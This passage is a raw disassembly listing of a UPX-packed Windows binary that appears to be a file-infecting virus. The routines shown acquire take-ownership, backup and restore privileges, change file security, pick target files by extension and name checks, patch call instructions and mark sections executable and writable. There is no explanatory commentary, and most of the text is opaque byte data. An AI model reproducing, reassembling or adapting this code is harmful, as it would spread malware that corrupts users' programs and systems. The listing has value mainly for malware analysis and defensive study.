39BAA50Ah dd 0E4C00010h, 0BAA50A03h, 66001039h, 0C085F7ABh, 1039h dd 66000010h, 74C081B8h, 8C48003h, 39BAA50Ah, 0AB660010h dd 0BE85B60Fh, 0AB001039h, 0FFFB8BE8h, 0C085F7FFh, 1039h dd 74400000h, 250B00Eh, 1039B885h, 71E8AA00h, 8DFFFFFBh dd 8D89FE4Fh, 1042CCh, 39C085F7h, 10h, 17748000h, 8BAAE8B0h dd 1042F085h, 83C72B00h, 89AB04E8h, 1042F0BDh, 0E805EB00h dd 0FFFFFBB2h, 
0FFFB3BE8h, 0C085F7FFh, 1039h, 75000100h dd 0A40B00Bh, 1039B885h, 0FEBAA00h, 0C083B866h, 39B8A50Ah dd 0AB660010h, 0F7AA01B0h, 1039C085h, 2000000h, 0F72F7500h dd 1039C085h, 4000000h, 0B01A7500h, 0BA850AC0h, 8A001039h dd 1039BFA5h, 10E0C100h, 8166B866h, 0EB00B0ABh, 0A40B008h dd 1039BA85h, 85F7AA00h, 1039C0h, 80000h, 0B8661075h, 0A50AE883h dd 1039B9h, 1B0AB66h, 48B008EBh, 39B9850Ah, 0E8AA0010h dd 0FFFFFAB0h, 39C085F7h, 10h, 75B10010h, 0B8662575h, 0A50AF883h dd 1039B9h, 0C033AB66h, 0CCBD29AAh, 0F7001042h, 1039C085h dd 20000000h, 0B11F7500h, 661BEB77h, 0A1809B8h, 1039B9A5h dd 3E4C000h, 39B9A50Ah, 0AB660010h, 42CCBD29h, 0C18A0010h dd 42CCA58Ah, 0AB660010h, 850258B0h, 1039B8h, 0FA4AE8AAh dd 85F7FFFFh, 1039C0h, 2000003h, 85F72C74h, 1039C0h, 8000000h dd 85F72075h, 1039C0h, 6000000h, 0AFE80A75h, 0E8FFFFF9h dd 0FFFFFA1Ch, 0FFF9D1E8h, 0FA12E8FFh, 85F7FFFFh, 1039C0h dd 10000000h, 0C9B00874h, 0F9FEE8AAh, 85F7FFFFh, 1039C0h dd 400000h, 7B02A74h, 39B8852Ah, 0E0C10010h, 8890D1Ah dd 0A5020024h, 1039B8h, 8003E4C0h, 0E8AB04C4h, 0FFFFF9D0h dd 0E8AA61B0h, 0FFFFF9C8h, 0E0FFB866h, 39B8A50Ah, 0AB660010h dd 0FFF9B7E8h, 0C085F7FFh, 20001039h, 74000000h, 0C085F76Fh dd 1039h, 74800000h, 8BC78B1Fh, 1042F08Dh, 89C12B00h, 0FFE8FC41h dd 0E8FFFFF9h, 0FFFFF988h, 0E8AAC3B0h, 0FFFFF980h, 8D8BC78Bh dd 1042C4h, 4189C12Bh, 0A58B0FCh, 1039B885h, 65E8AA00h dd 0F7FFFFF9h, 1039C085h, 80000000h, 660C7400h, 0AC350B8h dd 1039B885h, 660AEB00h, 0AE0FFB8h, 1039B8A5h, 0E8AB6600h dd 0FFFFF93Ch, 39C085F7h, 30010h, 5F740200h, 858BCF8Bh dd 1042DCh, 4889C82Bh, 0F7C933FCh, 1039C085h, 0 dd 8D0E7501h, 1039B885h db 0 ; --------------------------------------------------------------------------- loc_31012F35: ; CODE XREF: UPX2:31012F3Bj mov cl, [eax] inc eax cmp cl, 3 jnb short loc_31012F35 lea eax, ds:102444h[ecx*8] shl eax, 8 mov al, 8Bh stosd jecxz short loc_31012F52 mov ax, 0C031h stosw loc_31012F52: ; CODE XREF: UPX2:31012F4Aj mov ax, 808Fh push 0B8h add ah, cl stosw pop eax stosd test ecx, ecx jnz short loc_31012F6B mov 
ax, 0C031h stosw loc_31012F6B: ; CODE XREF: UPX2:31012F63j mov al, 0C3h stosb ; --------------------------------------------------------------------------- dw 0D1E8h db 0F8h ; ø db 2 dup(0FFh), 8Dh db 85h ; … align 2 dw 1039h db 0 ; --------------------------------------------------------------------------- test dword ptr [ebp+1039C0h], 20000000h jnz short loc_31012F8B push edi sub edi, eax pop eax jmp short loc_31012FA4 ; --------------------------------------------------------------------------- loc_31012F8B: ; CODE XREF: UPX2:31012F83j mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042E4h] add [ebp+1042C4h], edx add [ecx], edi mov eax, [esp+4] loc_31012FA4: ; CODE XREF: UPX2:31012F89j mov [ebp+101069h], edi mov edi, [ebp+1042C8h] sub eax, [ebp+1042C4h] test dword ptr [ebp+1039C0h], 40h jz short loc_31012FC4 neg eax loc_31012FC4: ; CODE XREF: UPX2:31012FC0j stosd retn 4 ; --------------------------------------------------------------------------- db 56h ; V db 57h, 83h, 0BDh db 0 db 43h, 10h, 0 db 0 db 0Fh, 84h, 0D9h db 1 db 2 dup(0), 0E8h db 0Dh align 4 db 4Bh ; K db 45h, 52h, 4Eh db 45h ; E db 4Ch, 33h, 32h db 2Eh ; . 
db 44h, 2 dup(4Ch) db 0 db 0FFh, 95h, 0AEh db 3Eh ; > db 10h, 0, 89h db 85h ; … db 14h, 43h, 10h db 0 db 53h, 8Bh, 58h db 3Ch ; < db 3, 0D8h, 0FFh db 73h ; s db 28h, 8Bh, 43h db 34h ; 4 db 0E8h, 0E5h, 0F4h db 0FFh db 0FFh, 8Bh, 95h db 0F4h ; ô db 42h, 10h, 0 db 5Bh ; [ db 3, 42h, 0Ch db 89h ; ‰ db 85h, 18h, 43h db 10h align 2 dw 4203h db 8 db 89h, 85h, 1Ch db 43h ; C db 10h, 0, 8Bh db 73h ; s db 28h, 0FFh, 0B3h db 80h ; € align 4 db 0E8h ; è db 0BEh, 0F4h, 0FFh db 0FFh db 8Bh, 0BDh, 0F4h db 42h ; B db 10h, 0, 56h db 0E8h ; è db 0B2h, 0F4h, 0FFh db 0FFh db 8Bh, 95h, 0F4h db 42h ; B db 10h, 0, 8Bh db 4Ah ; J db 8, 3, 4Ah db 0Ch db 2Bh, 0CEh, 83h db 0E9h ; é db 5, 0Fh, 88h db 60h ; ` db 1, 2 dup(0) db 0Fh db 84h, 5Ah, 1 db 0 align 2 dw 0B503h db 0F8h ; ø db 42h, 10h, 0 db 3 db 0B5h, 0B4h, 42h db 10h align 2 ; START OF FUNCTION CHUNK FOR sub_31013181 loc_31013062: ; CODE XREF: sub_31013181+29j lodsb cmp al, 0E8h ; END OF FUNCTION CHUNK FOR sub_31013181 jnz loc_3101310D lea eax, [esi+4] sub eax, [ebp+1042B4h] add eax, [esi] push eax call near ptr dword_310124E8+3 cmp dword ptr [ebp+1042F4h], 0 jnz short loc_31013090 cmp eax, [edi+0Ch] jnb loc_310131A9 jmp short loc_3101309C ; --------------------------------------------------------------------------- loc_31013090: ; CODE XREF: UPX2:31013083j cmp [ebp+1042F4h], edx jnz loc_310131A9 loc_3101309C: ; CODE XREF: UPX2:3101308Ej add eax, [ebp+1042B4h] cmp word ptr [eax], 25FFh jnz loc_310131A9 mov eax, [eax+2] sub eax, [ebx+34h] push eax call near ptr dword_310124E8+3 cmp [ebp+1042F4h], edi jnz loc_310131A9 add eax, [ebp+1042F8h] add eax, [ebp+1042B4h] mov eax, [eax] sub eax, [edi+0Ch] jb loc_310131A9 cmp eax, [edi+8] jnb loc_310131A9 ; START OF FUNCTION CHUNK FOR sub_31013181 loc_310130E5: ; CODE XREF: sub_31013181+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042B4h] push edx push eax push dword ptr [ebp+104314h] call dword ptr [ebp+103E6Eh] pop edx test eax, eax jnz loc_310131BF jmp loc_310131A9 ; END OF FUNCTION CHUNK 
FOR sub_31013181 ; --------------------------------------------------------------------------- loc_3101310D: ; CODE XREF: UPX2:31013065j cmp al, 0FFh jnz loc_310131A9 cmp byte ptr [esi], 15h jnz loc_310131A9 mov eax, [esi+1] sub eax, [ebx+34h] push eax call near ptr dword_310124E8+3 cmp [ebp+1042F4h], edi jnz short loc_310131A9 add eax, [ebp+1042F8h] add eax, [ebp+1042B4h] mov [ebp+104320h], eax mov eax, [eax] cmp eax, [ebp+104318h] jb short loc_31013156 cmp eax, [ebp+10431Ch] jb short loc_310131BF loc_31013156: ; CODE XREF: UPX2:3101314Cj cmp eax, 70000000h jb short loc_31013194 call sub_31013181 lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104320h] jnz short locret_31013180 add esp, 10h push dword ptr [ecx] pop dword ptr [esp+1Ch] popa jmp short loc_3101319B ; --------------------------------------------------------------------------- locret_31013180: ; CODE XREF: UPX2:31013172j retn ; =============== S U B R O U T I N E ======================================= sub_31013181 proc near ; CODE XREF: UPX2:3101315Dp var_8 = dword ptr -8 var_4 = dword ptr -4 ; FUNCTION CHUNK AT 31013062 SIZE 00000003 BYTES ; FUNCTION CHUNK AT 310130E5 SIZE 00000028 BYTES pop dword ptr [ebp+1042D4h] pusha mov esi, [ebp+1042B4h] call near ptr dword_310125B0+42h popa loc_31013194: ; CODE XREF: UPX2:3101315Bj test eax, 80000000h jnz short loc_310131A9 loc_3101319B: ; CODE XREF: UPX2:3101317Ej sub eax, [edi+0Ch] jb short loc_310131A9 cmp eax, [edi+8] jb loc_310130E5 loc_310131A9: ; CODE XREF: UPX2:31013088j ; UPX2:31013096j ... 
dec ecx jnz loc_31013062 mov edi, [esp+4+var_4] and dword ptr [edi+29C0h], 0FFBFFFFFh jmp short loc_31013201 ; --------------------------------------------------------------------------- loc_310131BF: ; CODE XREF: sub_31013181-7Fj ; UPX2:31013154j or dword ptr [edx+24h], 0E0000060h dec esi xor eax, eax mov ecx, [esp+8+var_8] xchg eax, [ebp+104300h] mov [ebp+1042FCh], eax lea edi, [ecx+29C4h] add eax, [ebp+1042B4h] movsw movsd dec esi sub eax, esi add eax, [edx+14h] sub eax, [edx+0Ch] mov byte ptr [esi-5], 0E8h mov dword ptr [ecx+54h], 5 mov [esi-4], eax loc_31013201: ; CODE XREF: sub_31013181+3Cj pop edi pop esi retn sub_31013181 endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 57h ; W db 0FFh, 95h, 0BAh db 3Eh ; > db 10h, 0, 0C1h db 0E8h ; è db 1Fh, 0Fh, 85h db 1Ah db 1, 2 dup(0) db 50h ; P db 54h, 6Ah, 28h db 6Ah ; j db 2 dup(0FFh), 95h db 1Ah db 3Fh, 10h, 0 db 85h ; … db 0C0h, 5Fh, 0Fh db 88h ; ˆ db 5, 1, 0 db 0 db 0E8h, 58h, 0E4h db 0FFh db 0FFh, 0E8h, 11h db 0 db 2 dup(0), 53h aEtfilesecurity db 'etFileSecurityA',0 db 0FFh db 0B5h, 88h, 42h db 10h align 2 dw 95FFh db 6Eh ; n db 3Eh, 10h, 0 db 89h ; ‰ db 85h, 90h, 42h db 10h align 2 dw 19E8h db 0 db 2 dup(0), 53h aEtakeownership db 'eTakeOwnershipPrivilege',0 db 57h ; W db 0E8h, 29h, 0E8h db 0FFh db 0FFh, 0E8h, 13h db 0 db 2 dup(0), 53h aErestoreprivil db 'eRestorePrivilege',0 dw 0E857h db 0Bh db 0E8h, 2 dup(0FFh) db 0E8h ; è db 12h, 2 dup(0) db 0 aSebackupprivil db 'SeBackupPrivilege',0 db 57h dd 0FFE7EEE8h, 18E8FFh, 65530000h, 6E616843h, 6F4E6567h dd 79666974h, 76697250h, 67656C69h, 0E8570065h, 0FFFFE7CBh dd 858D5450h, 103DCCh, 6A50646Ah, 95FF5701h, 103F26h, 0FF243C89h dd 103E6295h, 8DC02A00h, 104184BDh, 50505000h, 3DCCB5FFh dd 1680010h, 54000400h, 0FF57016Ah, 10429095h, 46A5400h dd 9095FF57h, 83001042h, 0B5FF14C4h, 104288h, 3E9E95FFh dd 0C35F0010h, 4184B58Dh, 0FF560010h, 103EA295h, 0FFF88300h dd 0BB840Fh, 85890000h, 104294h, 0FF56006Ah, 103EDE95h dd 
0FC08500h, 0A484h, 50C02B00h, 50036A50h, 68016Ah, 56C00000h dd 3E7E95FFh, 0F8830010h, 7840FFFh, 89000006h, 10429885h dd 9C8D8D00h, 8D001042h, 1042A495h, 6A525100h, 95FF5000h dd 103EAAh, 0FFFF883h, 5D584h, 0FF006A00h, 104298B5h, 0A695FF00h dd 8300103Eh, 840FFFF8h, 5BEh, 42AC8589h, 0C9330010h, 5051C303h dd 51046A51h, 4298B5FFh, 95FF0010h, 103E82h, 840FC085h dd 59Ah, 8589C933h, 1042B0h, 68515151h, 0F001Fh, 0CA95FF50h dd 8500103Eh, 53840FC0h, 89000005h, 1042B485h, 27B8C300h dd 8B000073h, 85F7384Bh, 1039C0h, 20000000h, 85030675h dd 101069h, 0C103D233h, 0E1F7F1F7h, 42C08589h, 0CBB80010h dd 8B000029h, 85033C4Bh, 101069h, 0C103D233h, 0E1F7F1F7h dd 42B88589h, 0FC30010h, 0F9064BB7h, 538D35E3h, 43B70F18h dd 49D00314h, 328C16Bh, 5F3A81D0h, 0F96E6977h, 7A831D74h dd 0E072010Ch, 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh dd 0AC853BC1h, 0C3001042h, 1024548Bh, 828FC033h, 0B8h dd 0EBCF8BC3h, 84BD8D0Bh, 0FC001041h, 0C933DF8Bh, 72613CACh dd 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch, 0E875003Ch dd 18BC9E3h, 4558453Dh, 3D0B7400h, 524353h, 0FF33850Fh dd 38BFFFFh, 4E49573Dh, 26840F43h, 3DFFFFFFh, 4E554357h dd 0FF1B840Fh, 573DFFFFh, 0F323343h, 0FFFF1084h, 53503DFFh dd 840F4F54h, 0FFFFFF05h, 2DE8DB33h, 75FFFFFEh, 0FCFAE810h dd 21E8FFFFh, 0FFFFFFEh, 0FFFEEC84h, 0E8D233FFh, 16h, 0FFFF63E8h dd 0E8FFh, 815D0000h, 10344FEDh, 3FAE900h, 0FF640000h dd 0B4B58B32h, 64001042h, 81662289h, 0F5A4D3Eh, 3E385h dd 3C5E8B00h, 8166DE03h, 0F45503Bh, 3D385h, 1643F700h dd 2000h, 3C6850Fh, 43F60000h, 840F025Ch, 3BCh, 3D08438Bh dd 0A0A0A0A0h, 3AE840Fh, 203D0000h, 0F202020h, 3A384h dd 0C88B8B00h, 0E3000000h, 54E85116h, 3FFFFEFh, 1042F88Dh dd 83CE0300h, 83004061h, 0E8004461h, 0FFFFFE9Bh, 37A820Fh dd 0A5830000h, 1042FCh, 8428B00h, 2B104A8Bh, 330473C1h dd 305EBC0h, 104A89C8h, 42BC8589h, 4A030010h, 0B80Ch, 0E8510001h dd 0FFFFE68Ah, 39BE9530h, 20B10010h, 39BFB530h, 206A0010h dd 7858C9FEh, 0E670E814h, 0D285FFFFh, 0D3C2940Fh, 0C09531E2h dd 0EB001039h, 0C085F7E5h, 1039h, 74020000h, 0C085F722h dd 3001039h, 75000000h, 
0C0A5810Ch, 0FF001039h, 0EBF7FFFFh dd 0C08D810Ah, 1039h, 68100000h, 6, 66859h, 0E8580000h dd 0FFFFE622h, 39B8858Ah, 84860010h, 1039B82Ah, 0B8858800h dd 0E2001039h, 0C085F7E0h, 8001039h, 75000000h, 0BABD8009h dd 1001039h, 85F7C574h, 1039C0h, 10000000h, 0BD801B74h dd 1039B8h, 80B07405h, 1039B9BDh, 0A7740500h, 39BABD80h dd 74050010h, 0C085F79Eh, 1039h, 74004000h, 0B8BD8009h dd 2001039h, 0A5838977h, 104300h, 0F272E800h, 43E8FFFFh dd 0E8FFFFFDh, 271h, 42B89D8Bh, 9D030010h, 1042BCh, 0FFFC5BE8h dd 51840FFFh, 8B000002h, 1042B4B5h, 3C5E8B00h, 5CE8DE03h dd 0FFFFFFDh, 23B82h, 244A8100h, 0E0000060h, 5652FE8Bh dd 3147A03h, 85F7107Ah, 1039C0h, 20000000h, 0BD891475h dd 104304h, 39CCB58Dh, 8D8B0010h, 101069h, 0B957A4F3h dd 0A73h, 1000B58Dh, 0A5F30010h, 2E300B1h, 85F7A4F3h, 1039C0h dd 20000000h, 0AE840Fh, 73FF0000h, 0ED9DE828h, 958BFFFFh dd 1042F4h, 840FD285h, 98h, 42B4B58Bh, 4A8B0010h, 244A8110h dd 0E0000060h, 73084A2Bh, 3C93302h, 8D3B1472h, 101069h dd 10698D8Bh, 56720010h, 83243C8Bh, 101069A5h, 0A7830000h dd 69h, 87A8B00h, 3084A01h, 8BF787F7h, 1042C885h, 0C085F700h dd 40001039h, 74000000h, 318F702h, 30290C72h, 4300B589h dd 738B0010h, 0F7300128h, 1039C085h, 4000h, 0F7027400h dd 2BE85118h, 59FFFFFCh, 73030CEBh, 0C722B28h, 0A4F35651h dd 0B58D595Fh, 1039CCh, 4304BD89h, 0A4F30010h, 310F5E5Fh dd 37878D92h, 3A000001h, 1039BE95h, 69067500h, 345678D2h dd 50896612h, 0D9E1E8E7h, 8B5AFFFFh, 4A030C4Ah, 0C085F710h dd 1039h, 8D200000h, 13750541h, 43008D89h, 85030010h, 101069h dd 69A783h, 2B000000h, 87892843h, 54h, 3F7C85F7h, 10010h dd 7740000h, 0A00843C7h, 0F7A0A0A0h, 1039C085h, 40000000h dd 52077400h, 0FFF75BE8h, 8D8B5AFFh, 104300h, 4B8905E3h dd 8B0DEB28h, 1042FC8Dh, 0EB02E300h, 284B8B03h, 39C085F7h dd 30010h, 14740000h, 4304858Bh, 8D030010h, 1042ECh, 42E88503h dd 8010010h, 8B104A8Bh, 1042B885h, 84A3900h, 4A890373h dd 10420108h, 586383h, 42C0858Bh, 0CC680010h, 1000029h dd 1590842h, 958A5043h, 1039BEh, 39C085F7h, 10h, 6742000h dd 10698D03h, 0B60010h, 39C085F7h, 10h, 14750002h, 85F7C6FEh dd 
1039C0h, 40000h, 0B58A0675h, 1039BFh, 39C085F7h, 40000010h dd 0B750000h, 0C202078Ah, 0E2D602AAh, 8A09EBF7h, 0AAC23207h dd 0F7E2D602h, 8B64D233h, 28F6422h, 98BD8358h, 1042h, 0FABF840Fh dd 0B5FFFFFFh, 1042B4h, 3EEE95FFh, 0B5FF0010h, 1042B0h dd 3E6295FFh, 8D8D0010h, 10429Ch, 42A4958Dh, 52510010h dd 0B5FF006Ah, 104298h, 3EE295FFh, 0B5FF0010h, 104298h dd 3E6295FFh, 0B58D0010h, 104184h, 4294B5FFh, 0FF560010h dd 103EDE95h, 98A58300h, 1042h, 0E8C3h, 6A5D0000h, 0CBED8101h dd 58001038h, 85C10FF0h, 101588h, 83C3C085h, 0FF0FFC8h dd 158885C1h, 3DC30010h, 2A0010h, 81661C75h, 6C0C247Ch dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFAB5h, 0FFFFD2E8h dd 0FF2E61FFh, 3456782Dh, 25B812h, 0E8600000h, 0FFFFFFA5h dd 448B3975h, 0B58D3024h, 104184h, 6608508Bh, 2063A81h dd 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h, 103F2Eh, 8108C483h dd 3F3F5C3Eh, 8303755Ch, 62E804C6h, 0E8FFFFFAh, 0FFFFFF7Fh dd 74B8C361h, 0EB000000h, 2FB8B1h, 1DE80000h, 0C2000000h dd 30B80020h, 0E8000000h, 10h, 0B80024C2h, 185h, 3E8h dd 2CC200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h dd 1A8B5D30h, 39A2ED81h, 0B3E80010h, 61FFFFE0h, 30004C2h dd 5010706h, 92F54202h, 0E893BCA8h, 0C8h, 0FF8B6Bh, 118h dup(0) dd 5C000000h, 61004200h, 65007300h, 61004E00h, 65006D00h dd 4F006400h, 6A006200h, 63006500h, 73007400h, 56005C00h dd 53007400h, 63006500h, 7400h, 809B4700h, 8308AD7Ch, 9103317Ch dd 80ADA07Ch, 7Ch, 0 dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 80ABDE7Ch dd 81153C7Ch, 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch dd 835DCA7Ch, 8111DA7Ch, 812ADE7Ch, 821BA57Ch, 801D777Ch dd 80B9057Ch, 80BB767Ch, 8309E17Ch, 863DE57Ch, 863F587Ch dd 8127827Ch, 831CB87Ch, 8024427Ch, 810B1C7Ch, 80B9747Ch dd 809A517Ch, 810D877Ch, 90D4607Ch, 90D6827Ch, 90D7547Ch dd 90D7697Ch, 90D7937Ch, 7Ch, 90DC5500h, 90DCFD7Ch, 90DD907Ch dd 90DDBA7Ch, 90DEB67Ch, 90E0457Ch, 90EA327Ch, 9130C67Ch dd 7Ch, 14h dup(0) dd 320030h, 31014064h, 42005Ch, 730061h, 4E0065h, 6D0061h dd 640065h, 62004Fh, 65006Ah, 
740063h, 5C0073h, 740056h dd 650053h, 740063h, 0D2h dup(0) dd 0D7000000h, 310110h, 1307h dup(0) UPX2 ends ; Section 4. (virtual address 00019000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 00019000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 31019000h align 2000h _idata2 ends end start